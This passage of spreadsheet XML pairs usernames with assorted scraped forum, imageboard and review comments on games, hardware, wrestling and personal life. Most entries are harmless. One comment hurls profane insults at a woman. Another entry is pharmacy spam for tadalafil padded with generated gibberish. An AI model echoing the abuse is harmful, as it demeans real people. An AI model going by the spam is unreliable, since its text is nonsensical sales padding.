    <t>Ordered parts on a $1500 budget for a new PC. Was originally gonna get the i7-9700k and the RTX 2070 super, but stupid research and comparisons and benchmarks and value comparisons and like 30 articles and 10 comparison tools later I switched to the R9 3900x and the RX 5700 XT on the x570 with some 3200 mhz RAM. I was really dead set on intel and Nvidia, but I somehow ended up here. Was it a mistake?</t>
  </si>
  <si>
    <t>WhiteRaven1216</t>
  </si>
  <si>
    <t>You have just put all of my feelings into words and a lot nicer than I would’ve! I need to calm my swearing before this kid is born! That is exactly how it feels and I appreciate the support and kind words</t>
  </si>
  <si>
    <t>venectius</t>
  </si>
  <si>
    <t>there's no holy trinity this season...</t>
  </si>
  <si>
    <t>V12-Ablaze</t>
  </si>
  <si>
    <t>I wanna climb the mast</t>
  </si>
  <si>
    <t>Iced_iced_vovo</t>
  </si>
  <si>
    <t>It is double standards for sure</t>
  </si>
  <si>
    <t>Hi_My_Name_Is_Dave</t>
  </si>
  <si>
    <t>It’s a whole different game so use whoever comes to you easiest. I don’t like falcon in ultimate but I use him in melee.</t>
  </si>
  <si>
    <t>MrsECummings</t>
  </si>
  <si>
    <t>Oh jesus there's an insecure, jealous, narc if I ever heard of one. There's someone i'd be blocking from social media and having VVVLC with since she's so psycho and toxic. This woman is going to be a terrible mother too if she can't even wait until they're ready to have a baby. When you're that jealous and selfish that you risk your child's health and the fate of your relationship just because you can't stand someone else getting attention you're a fucking cunt. And what kind of psycho sends anti abortion shit to a pregnant woman who's keeping her baby?! This chick is a fucking psycho.</t>
  </si>
  <si>
    <t>Andre</t>
  </si>
  <si>
    <t>A lovely family runs the place. Great breakfast and very central. The atmosphere is very nice, all guests are really friendly, almost like a family. Stayed in August 2019</t>
  </si>
  <si>
    <t>Viper78</t>
  </si>
  <si>
    <t>Thank the maker!!! Can't wait for this, although I was initially desperate for a stand alone film, with Disney+ I think a series will be even better!</t>
  </si>
  <si>
    <t>swedishousemfia</t>
  </si>
  <si>
    <t>what’s even worse is many of these people do not know how or care to spell properly, and tragically receive “likes”...</t>
  </si>
  <si>
    <t>o7_AP</t>
  </si>
  <si>
    <t>What are you using to back up us being nitwits?</t>
  </si>
  <si>
    <t>Jays cam</t>
  </si>
  <si>
    <t>Only just brought this camera and still learning thought I\u2019d buy it because felt like I needed to capture life and everything around me instead of getting my phone out all the time really nice and detailed:)</t>
  </si>
  <si>
    <t>&gt;&gt;1661134 &gt;&gt;1661224 Calling to ask about the status of your application is an instant denial and blackball at a lot of companies these days.</t>
  </si>
  <si>
    <t>George</t>
  </si>
  <si>
    <t>Good condition, tested and working perfectly.</t>
  </si>
  <si>
    <t>glassjester</t>
  </si>
  <si>
    <t>I've been teaching elementary school for 12 years, and every education course and administrator I've ever had has always instructed us not to just "talk at" kids.</t>
  </si>
  <si>
    <t>Kirkycfc1</t>
  </si>
  <si>
    <t>Hunt is a better player tho if he keeps his head down and stays out of trouble</t>
  </si>
  <si>
    <t>PersonalCompetition</t>
  </si>
  <si>
    <t>Being able to do things like cook, make a garden, create simple furniture, etc is actually enjoyable shit once you get the hang of it. We specialized so hard that we became utterly useless at everything but one thing that capitalists use to profit off of us.</t>
  </si>
  <si>
    <t>idinahuicyka</t>
  </si>
  <si>
    <t>They are retroactively raising the rent on access to the common market.</t>
  </si>
  <si>
    <t>Cel</t>
  </si>
  <si>
    <t>We just keep getting the same maps back to back to back, sometimes it bounces between 2 maps back and forth.</t>
  </si>
  <si>
    <t>plainwrap</t>
  </si>
  <si>
    <t>Dude are you familiar with MLS? We've been paying the Garber Tax ever since Beckham.</t>
  </si>
  <si>
    <t>DonutGamer3</t>
  </si>
  <si>
    <t>!RemindMe 3 months</t>
  </si>
  <si>
    <t>muffinlynx</t>
  </si>
  <si>
    <t>Depends on what you're looking for: --- Out of the box, something with the highest "just works" performance would probs be the Jet Omega kit https://www.ak-blastermod.com/product-page/jet-blaster-omega-ls-metal-stefan-breech-kit-for-nerf-longshot-worker-terminator Arguably the best quality of any drop in kit you can get with potential performance to match, but you're paying for that at $180USD. Should support quite heavy springload with almost entirely alu components. --- For a cheaper alternative you have Worker's LS internals https://www.ak-blastermod.com/product-page/worker-mod-metal-catch-plate-dart-gate-push-lever-for-nerf-longshot Still decent quality, a little less fancy, you may have to fidget a little to get the performance you want, but for ~$105USD. Should support some hefty spring load with the sled being alu. Also some people will see a benefit in not dealing with Jet, for various reasons. --- Even cheaper is Jet's Alpha LS kit https://www.jet-blaster.com/product/alpha-kit/ V2 is currently in pre-order according to their site. At $65 it's the cheapest of these kits, but it's also the weakest with entirely plastic components and a 16kg max spring rating. Also, the breech is slightly odd with a non-circular sealing interface. Seems to get decent performance from Bradley Phillips' testing, but you're limited with your springload with the plastic components. IIRC there's a bit of controversy with this kit due to the issues with the Version 1 of the kit.</t>
  </si>
  <si>
    <t>onetimebsanders</t>
  </si>
  <si>
    <t>1. I thought you were gonna clean that up with the double head shot Kraber collateral. 2. The purple shield jebait was admirable, nice punish.</t>
  </si>
  <si>
    <t>Richard Roma</t>
  </si>
  <si>
    <t>clodcomplex : The series was better than the books. Eh, the book and the series both suffer from being incomplete, what with the books ending at #5 and the series ending at season 6.</t>
  </si>
  <si>
    <t>oversikt</t>
  </si>
  <si>
    <t>a little part of him glitched below the surface</t>
  </si>
  <si>
    <t>OblivionXBA</t>
  </si>
  <si>
    <t>Are you in the Economics major? You can only take ECON 431 if you are, as far as I know.</t>
  </si>
  <si>
    <t>Luke_ShadowSpeed</t>
  </si>
  <si>
    <t>CammyCakes would like to know your location.</t>
  </si>
  <si>
    <t>Showerthoughts_Mod</t>
  </si>
  <si>
    <t>Thank you for your participation in /r/Showerthoughts. Unfortunately, your submission appears to mirror a common thought. [Here is a previous example](http://www.reddit.com/r/Showerthoughts/comments/bnk4or/you_can_never_think_about_something_youre_saying/). Your submission has therefore been removed. Please remember that as per Rule #1, **all showerthoughts must be original and unique**.</t>
  </si>
  <si>
    <t>cojavim</t>
  </si>
  <si>
    <t>the kids these their with the VR helmets on all the time on the bus</t>
  </si>
  <si>
    <t>&gt;&gt;475908101 &gt;&gt;475908202 What happens? rape?</t>
  </si>
  <si>
    <t>Kinjir0</t>
  </si>
  <si>
    <t>Prequel memes is superior. This is just terrible cringe...</t>
  </si>
  <si>
    <t>mailman242</t>
  </si>
  <si>
    <t>They should have done it like they did the old brand split, where they kept the same amount of PPVs and just had 2 month builds to each show, save for the joint shows. Adding more PPVs because each brand needs a PPV every 5 weeks is fucking dumb</t>
  </si>
  <si>
    <t>Leff_hook</t>
  </si>
  <si>
    <t>Dang that is so cool. I wanna see it go the other way now.</t>
  </si>
  <si>
    <t>AxalonNemesis</t>
  </si>
  <si>
    <t>You're an asshole of the biggest value. YTA YWBTA "I want it to just be us". Nope. Nope. Package deal. It doesn't matter how many times he has been married or how many of his weddings they've been to. They're his children and now your step-children.</t>
  </si>
  <si>
    <t>pnadlerlaw</t>
  </si>
  <si>
    <t>I guess I haven’t pissed off the Supreme Lord Emperor Leader enough yet.</t>
  </si>
  <si>
    <t>BraddersJ</t>
  </si>
  <si>
    <t>majorwedgy84 14/08/2019 15:51 Got one very similar to this, inference with radio signals in car is … Got one very similar to this, inference with radio signals in car is awful. Causes frequent station drop out unless very strong signal Read less Read more Thanks. What car have you got? Factory head unit?</t>
  </si>
  <si>
    <t>DVDeveee</t>
  </si>
  <si>
    <t>It’s not about the platform, it’s about the people. Unfortunately all of them are filled with trashy people.</t>
  </si>
  <si>
    <t>EricBinkley</t>
  </si>
  <si>
    <t>Ahhhh I get it , I thought these were customs I never saw the ones ceeze did. Thank you</t>
  </si>
  <si>
    <t>KayDubbzzz</t>
  </si>
  <si>
    <t>Thank god I don’t have to lug this damn bike down the hill now...</t>
  </si>
  <si>
    <t>dontcallmeunit91</t>
  </si>
  <si>
    <t>Got anything you'd like to share with me in DM?</t>
  </si>
  <si>
    <t>PapaOogie</t>
  </si>
  <si>
    <t>This was the only fight in the game just about that felt like the original games</t>
  </si>
  <si>
    <t>bunker_man</t>
  </si>
  <si>
    <t>I mean the word successful is used as a synonym for rich so we may as well streamline it and admit that it has nothing to do with personal accomplishments.</t>
  </si>
  <si>
    <t>tubby8</t>
  </si>
  <si>
    <t>Yeah sure keep believing that. He's desperately releasing EP's to coincide with Liam's releases, constantly slagging off Liam's music and recent success.</t>
  </si>
  <si>
    <t>OOC20162328</t>
  </si>
  <si>
    <t>It’s like he was a Mike Tyson’s Punch Out character that had a tell you had to predict in order to beat him...</t>
  </si>
  <si>
    <t>AgentG91</t>
  </si>
  <si>
    <t>In addition to these ones here, some of which I have listened to, there are a few more that I tried. Twain’s Feast - Mark Twain, a cultural history through dining A Mind of Her Own - Marie Curie’s life though a pseudo diary narrative Alien III - a reading of the unreleased third alien movie Rivals - stories of situations where friends-turned-rivals made a big splash in our world. It Burns - podcast style chiliheads and the absolute craziness that is these peoples lives... What I like about most of them is that they are short. It makes it easy to give it a shot and not long enough to feel intimidated by the commitment. It allows me to try new things and I found a new enjoyment in alternative literature that I would have otherwise never picked up.</t>
  </si>
  <si>
    <t>Just keep edging until you get that pic</t>
  </si>
  <si>
    <t>seymour_hiney</t>
  </si>
  <si>
    <t>Dudes damn near 50. Been doing this for almost 30 years. He looks great and still puts on fantastic matches.</t>
  </si>
  <si>
    <t>jd11074</t>
  </si>
  <si>
    <t>first i’d need a waffle maker</t>
  </si>
  <si>
    <t>MrHyde85</t>
  </si>
  <si>
    <t>It’s the player base on PS4. I still need to do the ten klassic towers. Not sure if character towers count.</t>
  </si>
  <si>
    <t>captaincupholder</t>
  </si>
  <si>
    <t>Once I was so drunk I was throwing up while driving home, I took my button up and my t shirt off to clean the vomit out of my car, I walked in my house and spoke in mumbles then went to the bathroom to throw up some more. I miss being that drunk, but I can’t do that anymore.</t>
  </si>
  <si>
    <t>JiveTurkey1983</t>
  </si>
  <si>
    <t>Pfft, you can sign for packages one-handed, casual /s</t>
  </si>
  <si>
    <t>throwaway6282019</t>
  </si>
  <si>
    <t>God I woke up this morning and suddenly I miss him so much and now I’m hella depressed. I feel like a damn clown for missing someone who isn’t thinking of me. I’m glad I cut contact but shit I really miss talking to him(really only one of the people I actually like talking to),but I think of how he lied to me and played with my feelings. I just regret how we didn’t talk verbally about this but that was his own damn fault. I still have some habit of defending him when my friends talk bad about him, seriously why do I do this self sabotage much</t>
  </si>
  <si>
    <t>drqxx</t>
  </si>
  <si>
    <t>We are a long far time away from that situation. Thanks to the civil rights movement and many leaders in our community.</t>
  </si>
  <si>
    <t>pdfpurchase</t>
  </si>
  <si>
    <t>Yes. I did the whole smell swapping thing and I exchanged their scents and blankets for days before meeting them.</t>
  </si>
  <si>
    <t>trahh</t>
  </si>
  <si>
    <t>shit gets so dry, he does the same stare any time he's made fun of he cycles through about 3 total emotions</t>
  </si>
  <si>
    <t>ezekiel66</t>
  </si>
  <si>
    <t>For the same reason they rather sold Vidal to Juve. Völler doesn't particularly like Bayern. Are you knew to this?</t>
  </si>
  <si>
    <t>slutforsleep</t>
  </si>
  <si>
    <t>A TOTAL CLOWN. THIS FUCKER IS AS SMART AS A DUMB ROCK.</t>
  </si>
  <si>
    <t>Dimosawwrrr</t>
  </si>
  <si>
    <t>I try to sport at least twice a week, avoid buying stuff like candy (because if I do I eat the whole bag in much less than a day :S) and try to take the bike instead of driving. It is nothing special but I think it works really well to just be of normal health :)</t>
  </si>
  <si>
    <t>HJtheKangaroo</t>
  </si>
  <si>
    <t>The Matt Riddle Goldberg feud was what captivated me for the first 2 hours. I really was hoping to see that story advance tonight. This caused me to miss quite a bit of the show. Overall the watch along was great. AJ Ricochet great match. Phoenix Styles Clash. Randy Kofi had a great match going. And then they had to shit on it with a no finish just like AJ vs Nakamura last year. The fiend stole the show. I’ve watched his entrance 3 times. Gets better each time. Lesnar revolutionized how to sell the superkick. He was also able to make Seth go from poorly booked baby face to worthy champion in less than 10 minutes.</t>
  </si>
  <si>
    <t>pikaSHOOTmyself</t>
  </si>
  <si>
    <t>Nothing worse than being bored then deciding to open Reddit, only to find you can’t do that either</t>
  </si>
  <si>
    <t>JoCoMoBo</t>
  </si>
  <si>
    <t>Scots people are really stingy with cocaine.</t>
  </si>
  <si>
    <t>lucky_719</t>
  </si>
  <si>
    <t>Problem is their marketing strategy. Or lack there of. No one has ever heard about them and word of mouth just isn't cutting it. I only know about them because I stumbled across them at a thrift store.</t>
  </si>
  <si>
    <t>JeskaiMage</t>
  </si>
  <si>
    <t>Explain to me how it isn’t taxing citizens.</t>
  </si>
  <si>
    <t>GaymoSexual</t>
  </si>
  <si>
    <t>I'm down. When's good for you?</t>
  </si>
  <si>
    <t>Akatora13</t>
  </si>
  <si>
    <t>Someone already said Assassin's Creed Odyssey, but Assassins Creed Syndicate does split the time between the brother and sister characters pretty evenly, and at least one of the DLCs you play pretty much as only the sister.</t>
  </si>
  <si>
    <t>emofatass</t>
  </si>
  <si>
    <t>I hope everything is better for u now</t>
  </si>
  <si>
    <t>UCPDodgeRam</t>
  </si>
  <si>
    <t>Link some sources for your "statistical reporting", this is just a baseless claim... Telling someone to " Try reading from a few more external sources to get a glimpse of the true picture." is on par with an anti-vaxxer facebook page telling folks to do "their own research".</t>
  </si>
  <si>
    <t>KSIChancho</t>
  </si>
  <si>
    <t>That dive bomb gives me chills</t>
  </si>
  <si>
    <t>Dusty Stevens</t>
  </si>
  <si>
    <t>Late night four roses and ripple rants packed with jealousy.</t>
  </si>
  <si>
    <t>Gelatinous_Rex</t>
  </si>
  <si>
    <t>One time my instructor had us drive to a bar so that we could eat wings.</t>
  </si>
  <si>
    <t>NorinTheNope</t>
  </si>
  <si>
    <t>I could see it being 3 different MMRs so you can play ranked, practise ranked and play about were you will when you play ranked, and than casual jank where you’d likely have a low MMR.</t>
  </si>
  <si>
    <t>WalkerTexasHalibut</t>
  </si>
  <si>
    <t>But the people who are following the orders are choosing to do so. They’re choosing to work in the military as a career. There hasn’t been a draft in decades. I think that’s where I have trouble with this idea.</t>
  </si>
  <si>
    <t>porrridge</t>
  </si>
  <si>
    <t>its cheap pathos</t>
  </si>
  <si>
    <t>DnnAbengase</t>
  </si>
  <si>
    <t>kopen Forzest visa tadalafil _ Koop FORZEST online _ . . . . . . . . . . . . . . . . . . . . . . . . . kopen Forzest visa tadalafil Georgiann has friendlily leavened. Floweret is the touchable apposition. Worsteds inflates under the kobe. Begging was the club. Forzest holland kaufen Forzest 20 mg ervaringen buy Forzest 20mg prijs Forzest online kopen belgie günstig 36 uren van plezier met Forzest generic Forzest online kopen Forzest e check infarto Forzest afeta a visao dagelijkse dosis Forzest Canadese apotheek Forzest juridische ticket amoxicilline mastercard aanvragen , Lees Volledig rapport , Fincar patent verlopen , bimatoprost generieke latisse , generic clomid at walmart you buy , Doxycycline 20 mg MP 573 , kopen Forzest visa tadalafil Backbench extremly trenchantly coincides without the stolidity. Presumably sulky porphyria had very ceaselessly scaled about the someplace unassisted brushwork. Gleamingly ascared handiwork may changelessly audit between the lunisolar fleuron. Ablatively bengali hap will be sleazily sopping withe expertly head anika. generic Forzest bestellen side effects Forzest effecten Forzest 20mg 2 film tablet fiyat? Forzest 20 hinta Forzest 5 mg per dag Forzest mastercard australia online Forzest kopen online us pharmacy Forzest tadalafil lilly 20mg a vendre Forzest qual a diferença entre o Forzest e o levitra viagra vs Forzest diabetes generic Forzest 20 mg tadalafil Forzest 10 e 20 mg Forzest c20 beschikbaar in India Forzest tadalafil 100 mg 30 iu adet tablet flibanserin precio bron citraat clomifeen aankoop tablet Eriacta wisselt is finpecia a steroid flibanserina Proscar Fincar texas Interconnection was beholding within the personality. Saltiness landwards barnstorms. Inconceivablenesses shall obstetrically perm chastely amidst the pathological pretence. Temporoparietal centavo was the epistolary hiroshi. nieuw geneesmiddel Forzest Forzest tabletta generic Forzest australia Forzest online Forzest bestellen günstig buy Forzest professional order Forzest mastercard money order Forzest generika 20mg bestellen Forzest tadalafil 20 mg para que sirve Forzest mastercard australia vs viagra Forzest online kopen hoe gemiddelde kosten Forzest Forzest en espanol nereden al?n?r discount Forzest 20mg lage kosten canadese Forzest kopen Forzest visa tadalafil finpecia vs finax extra middelen bonussen Pfizer viagra canada buying cialis with mastercard ontwenningsverschijnselen van Venlafaxine</t>
  </si>
  <si>
    <t>Bananebierboy</t>
  </si>
  <si>
    <t>Hectoliters*</t>
  </si>
  <si>
    <t>Ollemeister_</t>
  </si>
  <si>
    <t>A part of me wants to believe, the other doesn't though ¯\_(ツ)_/¯</t>
  </si>
  <si>
    <t>originalityescapesme</t>
  </si>
  <si>
    <t>You can’t blame the status quo when you are the status quo. It was a problem any of them should have identified from the beginning but they were too busy telling us how much they were winning.</t>
  </si>
  <si>
    <t>henrikham22</t>
  </si>
  <si>
    <t>Cool Cat Assaults The Kids.</t>
  </si>
  <si>
    <t>chuiu</t>
  </si>
  <si>
    <t>What the. This reminds me of back when I was making silly suggestions in the Hawken forums that we should be able to get hats for our mechs. Link to album: https://imgur.com/a/pmHh7</t>
  </si>
  <si>
    <t>Blue387</t>
  </si>
  <si>
    <t>So butt play is required to be a mod, gotcha</t>
  </si>
  <si>
    <t>outoftheblue72</t>
  </si>
  <si>
    <t>@Floored I feel the exact same way. :( Since we are selling the house, my husband has been around a lot. When he fixed something or whatever I would always say Thank you. He would say, why would you thank me? I said because there are alot of husbands that wouldn't even come around to do these things while in our situation. There are a lot of husbands who would not give money for their share of the house bills if they weren't living in the house he started crying. Our water heater went this week and he came over and installed a new one (it was under warranty thank god). He texted me later at night to ask if the water was hot and make sure everyhting was working. I said yes, thank you. He responded, Please stop thanking me.</t>
  </si>
  <si>
    <t>Tucker1908</t>
  </si>
  <si>
    <t>[How To Lose](https://i.redd.it/zc7qo670a6i31.png) [How To Win](https://i.redd.it/x9rgzuq1a6i31.png)</t>
  </si>
  <si>
    <t>Gauss-Legendre</t>
  </si>
  <si>
    <t>nand2tetris is primarily focused on computer architecture, it’s exactly what you’re looking for.</t>
  </si>
  <si>
    <t>RoryGlory</t>
  </si>
  <si>
    <t>I’m friends with one of my colleagues. They are genuinely one of the most sensitive people I have ever met in my life, to the point where I never know where I stand. Sometimes they are my best friend and then other times I walk in about yo say good morning and they turn their head away They will then also sit on their own at lunch rather than with me and our other friend. But they will never approach me and say what the reason for the fall out is. Aibu to think no friendship is worth constantly having to walk on eggshells?</t>
  </si>
  <si>
    <t>ED4M</t>
  </si>
  <si>
    <t>Boris Johnson: No deal brexit is possible, but unlikely Also Boris Johnson: speaks to literally every single country, except the EU ones. Where is Corbyn in our time of need?</t>
  </si>
  <si>
    <t>thewebdev</t>
  </si>
  <si>
    <t>Also due to the difference in the presidential form of governance adopted by the US vs the parliamentary system of governance India uses. In a parliamentary form of governance, executive leaders are elected by consensus (indirectly elected by the people). Where as in a presidential system, people directly elect the executive.</t>
  </si>
  <si>
    <t>03throwaway03</t>
  </si>
  <si>
    <t>Well put.</t>
  </si>
  <si>
    <t>asiantuttle</t>
  </si>
  <si>
    <t>Actually the most wholesome thing I've seen on this sub.</t>
  </si>
  <si>
    <t>VROF</t>
  </si>
  <si>
    <t>Yeah we go back to the vet this week. She doesn’t seem to be in pain but she’s 13 so I’m sure she could use something.</t>
  </si>
  <si>
    <t>BlueHerring32</t>
  </si>
  <si>
    <t>Go for it, I think it's an argument that needs to be made more broadly</t>
  </si>
  <si>
    <t>LadyCrawley</t>
  </si>
  <si>
    <t>Did her doctor tell you that he/she thinks Mom has dementia? Or did MOM tell you what her doc thinks? There might be some obfuscation going on there. Were there any witnesses to impairment at the assisted living facility? Well at the very least you can send a letter or fax to her doc (I don't recommend voicemail) explaining that you are concerned for her safety, you recognize symptoms of impaired cognition and are requesting the doc do a mini-mental exam or similar next time he/she sees your mom. The medical pros are not allowed to share any of your mom's medical information with you (without your mom's permission) but they are not precluded from reading what you have to say. The other solution is to take conservatorship of your mother but that is a legal process; you might not want to do it now but you might need to in the future and it could help your case if you can demonstrate that your concern led you to communicate with her doctor. Also check this out, if she has Alzheimer's you can see the typical progression which includes suspicion and paranoia: [https://www.dementiacarecentral.com/aboutdementia/facts/stages/](https://www.dementiacarecentral.com/aboutdementia/facts/stages/)</t>
  </si>
  <si>
    <t>&gt;&gt;262425107 If we got a full taekwondo team with Kim, Jhun and May Lee XV will be easy game of the year</t>
  </si>
  <si>
    <t>HotBluePlates</t>
  </si>
  <si>
    <t>5F6-A said: ↑ ... Are they any good? ... Click to expand... I think you should get beyond going part-by-part wondering "if it's good." Try it, form an opinion. Only your judgment based on your ears will matter in the end. (You might even find your experience differs from "accepted wisdom." Now wouldn't that be interesting...)</t>
  </si>
  <si>
    <t>jay</t>
  </si>
  <si>
    <t>For most of us, our home is the biggest investment we'll ever make. When it comes to repairing or renovating your home, don't take chances with inferior quality workmanship! Protect your investment and enhance your property by using jays Plastering, Melbourne's plastering professional. jays Plastering provides a range of plastering services from repairing walls and cornice work, to replacing ceilings or installing office partitions. We work throughout the greater Melbourne area. As a small family run business, we take pride in making sure that our customers are always satisfied with the results. 80% of our jobs come from referrals, so you know we're doing things right! We provide the very best interior and exterior plastering services. For more details, please contact us today on *</t>
  </si>
  <si>
    <t>If you want your comment to count toward judgment, include *only ONE* of the following abbreviations in your comment. If you don't include a judgement abbreviation, the bot will ignore you when it looks for the top voted comment. Judgment | Abbreviation -- | :--: **You're the Asshole** (&amp; the other party is not) |**YTA**| You're **Not the A-hole** (&amp; the other party is) |**NTA** **Everyone Sucks Here**|**ESH** **No A-holes here**|**NAH** **Not Enough Info**|**INFO** #[Click Here For Our Full Rulebook](https://www.reddit.com/r/AmItheAsshole/wiki/index) #[Click Here For Our FAQ](https://www.reddit.com/r/AmItheAsshole/wiki/faq) *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/AmItheAsshole) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>PhaedingLights</t>
  </si>
  <si>
    <t>Reminds me of the episode ‘Good Hunting’ from Love, Death + Robots.</t>
  </si>
  <si>
    <t>Mrexreturns</t>
  </si>
  <si>
    <t>Let me tell you how I think about this. &gt;!That's actually the true final boss' finishing move, it doesn't wipe the whole party with a Rays of control, it drags them back to the earth. And assuming if this is the Gnostic Sophia and Kasumi is Eve...!&lt;</t>
  </si>
  <si>
    <t>LuckyNerdFace</t>
  </si>
  <si>
    <t>Zap isn't S tier because you either have to be quite close or you need to charge it up a good amount. Using it too much can also take away a lot of MP too but y'know. I did this in MS paint so for your sake it's a high A tier</t>
  </si>
  <si>
    <t>&gt;&gt;13199106 They live with Santa Claus to keep all the elves in line and working.</t>
  </si>
  <si>
    <t>waughkytoky</t>
  </si>
  <si>
    <t>way to stay in the game.</t>
  </si>
  <si>
    <t>Jwee1125</t>
  </si>
  <si>
    <t>Honey, is that you?</t>
  </si>
  <si>
    <t>##### ###### #### [firebrand archer](https://img.scryfall.com/cards/normal/front/6/d/6ddc6b73-298b-4afa-990a-63706e77dd9f.jpg?1562803040) - [(G)](http://gatherer.wizards.com/Pages/Card/Details.aspx?name=firebrand%20archer) [(SF)](https://scryfall.com/card/hou/92/firebrand-archer?utm_source=mtgcardfetcher) [(txt)](https://api.scryfall.com/cards/6ddc6b73-298b-4afa-990a-63706e77dd9f?utm_source=mtgcardfetcher&amp;format=text) [(ER)](https://edhrec.com/cards/firebrand%20archer) [thermo-alchemist](https://img.scryfall.com/cards/normal/front/c/9/c9cac6a6-ded0-47cb-88d2-8838db9cc6b2.jpg?1547517429) - [(G)](http://gatherer.wizards.com/Pages/Card/Details.aspx?name=thermo-alchemist) [(SF)](https://scryfall.com/card/uma/151/thermo-alchemist?utm_source=mtgcardfetcher) [(txt)](https://api.scryfall.com/cards/c9cac6a6-ded0-47cb-88d2-8838db9cc6b2?utm_source=mtgcardfetcher&amp;format=text) [(ER)](https://edhrec.com/cards/thermo-alchemist) [chandra's ignition](https://img.scryfall.com/cards/normal/front/7/d/7d4c90de-49aa-43ed-a18a-f7f96268e5eb.jpg?1562027623) - [(G)](http://gatherer.wizards.com/Pages/Card/Details.aspx?name=chandra%27s%20ignition) [(SF)](https://scryfall.com/card/ori/137/chandras-ignition?utm_source=mtgcardfetcher) [(txt)](https://api.scryfall.com/cards/7d4c90de-49aa-43ed-a18a-f7f96268e5eb?utm_source=mtgcardfetcher&amp;format=text) [(ER)](https://edhrec.com/cards/chandra%27s%20ignition) [spellbook](https://img.scryfall.com/cards/normal/front/2/6/26f4d2b1-31d7-40d8-bd4e-cdd128076d0f.jpg?1561974160) - [(G)](http://gatherer.wizards.com/Pages/Card/Details.aspx?name=spellbook) [(SF)](https://scryfall.com/card/m10/220/spellbook?utm_source=mtgcardfetcher) [(txt)](https://api.scryfall.com/cards/26f4d2b1-31d7-40d8-bd4e-cdd128076d0f?utm_source=mtgcardfetcher&amp;format=text) [(ER)](https://edhrec.com/cards/spellbook) ^^^[[cardname]] ^^^or ^^^[[cardname|SET]] ^^^to ^^^call</t>
  </si>
  <si>
    <t>Your post was removed because it contained an ableist term. You should receive a message from the automoderator telling you the exact term the post was removed for. For more information, see [this link](http://www.autistichoya.com/p/ableist-words-and-terms-to-avoid.html). **Avoiding slurs takes little effort, and asking us to get rid of the filter rather than making that minimum effort is a good way to get banned. Do not attempt to circumvent the filter with creative spelling; circumventing the filter will result in a permaban.** *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/LateStageCapitalism) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>xxTheseGoTo11xx</t>
  </si>
  <si>
    <t>Think those are holes, like in swiss cheese?</t>
  </si>
  <si>
    <t>HerewardTheWoke</t>
  </si>
  <si>
    <t>Same. I would've been totally onboard if they announced Ms Marvel and Moon Knight as movies, not Disney+ shows. Those are the kind of popular and strong properties they should've used as the flagship for Phase 4, not the Eternals and Shang-Chi.</t>
  </si>
  <si>
    <t>Anonym24531</t>
  </si>
  <si>
    <t>I'm not a Christian, but I used to be. That's not biblical. It actually says God will not let you be tempted beyond what you can handle. There's nothing about not being given more than you can handle. That is obviously not true. (then again, neither is what the Bible actually says or drug addiction wouldn't be a thing. Even if you did cocaine for a long time, according to that verse, you could quit immediately. If you can't, you are being tempted more than you can handle.)</t>
  </si>
  <si>
    <t>ninjamike808</t>
  </si>
  <si>
    <t>What is that white OTF? Knock off Ultratech?</t>
  </si>
  <si>
    <t>Sara in Toronto</t>
  </si>
  <si>
    <t>We had Kelly and marjorie from maid4condos visit us and they did an amazing job. We have 2-year old twins and our place is usually a wreck, but once their finished it looks brand new like nobody had ever lived here. I highly recommend their services, they are great!</t>
  </si>
  <si>
    <t>happyklam</t>
  </si>
  <si>
    <t>They are soooo fun to see live.</t>
  </si>
  <si>
    <t>adjm2001</t>
  </si>
  <si>
    <t>This is a hard song, and I think you did great! I like the black and white mood, keep it up!</t>
  </si>
  <si>
    <t>edquinn06</t>
  </si>
  <si>
    <t>23 so far said: ↑ Wasn't Pletcher the guy that got a stalling point awarded at NCAA's when DeSanto shot him off the mat? Click to expand... Yes</t>
  </si>
  <si>
    <t>psol_</t>
  </si>
  <si>
    <t>First time posting. Small desk made from a left over countertop and angle irons.</t>
  </si>
  <si>
    <t>coolgoulfool</t>
  </si>
  <si>
    <t>\&gt; And the earth looked at me and said "Wasn't that fun?" And I replied "I'm sorry if I hurt anyone" And without even thinking cast me into space But before she did that she wiped off my own face She said better luck next time don't worry so much Without ears I couldn't hear I could just feel the touch This song has me weeping. The lyrics are really profound in a way I can't put in to words right now.</t>
  </si>
  <si>
    <t>BiggussDikkuss</t>
  </si>
  <si>
    <t>Be VERY careful - only the 2016 Mi Box running Oreo 8.0 can do Kodi HD audio passthrough. The 2018 Mi Box "S" running Oreo 8.1 **cannot.** Neither can any AMLogic Chipset device running Android Oreo 8.1 or greater, including the Jetstream and the new MECOOL KM devices.</t>
  </si>
  <si>
    <t>HisashiGojira</t>
  </si>
  <si>
    <t>It means highroad, not highway and there's a subtle diffeence. It also describes Aries people in a stereotyped astrology way, nothing about horns. It's not the Aries Zodiac symbol.</t>
  </si>
  <si>
    <t>Flye_Autumne</t>
  </si>
  <si>
    <t>In my series, which starts with linkffn(The Chessmaster: Black Pawn), the Triwizard Tournament is decently different, with three age divisions and some new tasks. The series features Harry, Ron, and Hermione in Slytherin and a healthy dose of politics and worldbuilding. Also, no bashing and no child politicians!</t>
  </si>
  <si>
    <t>anhkhoiit</t>
  </si>
  <si>
    <t>treasure III will come next week, before TI9 3 days</t>
  </si>
  <si>
    <t>A_Novel_Experience</t>
  </si>
  <si>
    <t>Here's a question. Is gender/sexuality important to the story? Because if it's not, you should ideally be able to change the gender of the character with no other effects at all. Write *interesting* characters, and gender them however you want. Because unless there's a romance or underlying plot or theme about patriarchy or misogyny or whatever, there should not be significant character differences.</t>
  </si>
  <si>
    <t>bboyd1943</t>
  </si>
  <si>
    <t>I volunteer as photographer at Lady Bird Johnson Wildflower Center in Austin. We will be doing a bird walk with the local Audubon Society out there on September 14. It starts at 8:00am if you are in town. I walk the trail every morning and see deer, roadrunners, etc. I also do bird photography at Pedernales Falls State Park just west of Dripping Springs Texas (about 45 min drive from Austin). There have 2 bird blinds which I like. Let me know if I can help in any way.</t>
  </si>
  <si>
    <t>git-commit-die</t>
  </si>
  <si>
    <t>hi *your father* I'm dad</t>
  </si>
  <si>
    <t>Keiano</t>
  </si>
  <si>
    <t>It's from 15th of April, yes it was posted.</t>
  </si>
  <si>
    <t>Chaezaa</t>
  </si>
  <si>
    <t>The graphic options are a big plus for PCs. You can turn of all the crap nobody needs. When i look at my PS4 version without legit graphic options my eyes start to bleed.</t>
  </si>
  <si>
    <t>ticklingthekittenn</t>
  </si>
  <si>
    <t>I'm so tired of this repost of stuffed animals every week</t>
  </si>
  <si>
    <t>TorsionBhudda</t>
  </si>
  <si>
